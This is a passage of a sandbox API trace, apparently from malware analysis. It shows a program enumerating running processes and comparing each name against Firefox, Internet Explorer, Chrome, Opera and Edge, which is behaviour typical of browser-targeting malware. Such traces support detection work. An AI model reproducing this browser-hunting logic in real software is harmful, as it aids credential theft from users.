th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0263.171] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0263.171] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0263.171] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0263.171] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0263.171] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.171] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0263.171] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0263.171] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0263.171] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0263.171] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0263.171] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.171] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0263.172] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0263.172] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0263.172] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0263.172] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0263.172] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.172] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0263.173] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0263.173] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0263.173] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0263.173] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0263.173] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.173] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.173] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0263.173] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0263.173] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0263.173] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0263.173] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.173] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.174] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0263.174] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0263.174] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0263.174] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0263.174] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.174] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.174] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0263.174] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0263.174] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0263.175] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0263.175] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.175] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.175] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0263.175] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0263.175] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0263.175] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0263.175] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.175] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.176] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0263.176] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0263.176] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0263.176] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0263.176] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.176] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0263.176] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0263.176] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0263.176] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0263.176] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0263.176] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.176] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.177] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0263.177] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0263.177] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0263.177] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0263.177] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.177] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.177] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0263.177] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0263.177] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0263.177] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0263.178] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.178] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0263.178] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0263.178] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0263.178] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0263.178] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0263.178] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.178] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0263.179] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0263.179] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0263.179] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0263.179] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0263.179] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.179] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0263.179] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0263.179] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0263.179] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0263.179] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0263.179] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.179] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.180] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0263.180] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0263.180] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0263.180] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0263.180] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.180] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0263.180] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0263.180] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0263.180] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0263.180] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0263.180] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.180] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0263.181] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0263.181] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0263.181] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0263.181] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0263.181] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.181] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0263.182] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0263.182] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0263.182] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0263.182] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0263.182] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.182] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0263.182] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0263.182] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0263.182] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0263.182] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0263.182] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.182] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0263.183] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0263.183] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0263.183] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0263.183] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0263.183] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.183] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0263.183] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0263.183] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0263.183] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0263.183] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0263.183] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.183] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0263.184] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0263.184] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0263.184] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0263.184] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0263.184] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.184] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0263.184] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0263.185] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0263.185] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0263.185] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0263.185] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.185] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0263.185] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0263.185] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0263.185] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0263.185] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0263.185] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.185] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0263.186] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0263.186] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0263.186] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0263.186] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0263.186] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.186] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0263.186] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0263.186] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0263.186] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0263.186] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0263.186] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.186] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0263.187] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0263.187] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0263.187] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0263.187] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0263.187] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.187] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0263.187] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0263.188] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0263.188] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0263.188] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0263.188] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.188] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0263.188] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0263.188] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0263.188] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0263.188] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0263.188] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.188] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0263.189] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0263.189] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0263.189] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0263.189] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0263.189] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.189] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0263.189] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0263.189] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0263.189] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0263.189] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0263.189] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.189] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0263.190] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0263.190] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0263.190] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0263.190] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0263.190] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.190] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0263.191] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0263.191] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0263.191] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0263.191] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0263.191] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.191] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0263.191] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0263.191] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0263.191] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0263.191] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0263.191] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.191] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0263.192] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0263.192] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0263.192] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0263.192] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0263.192] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.192] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0263.192] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0263.192] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0263.192] lstrcmpiA (lpString1="doctrine 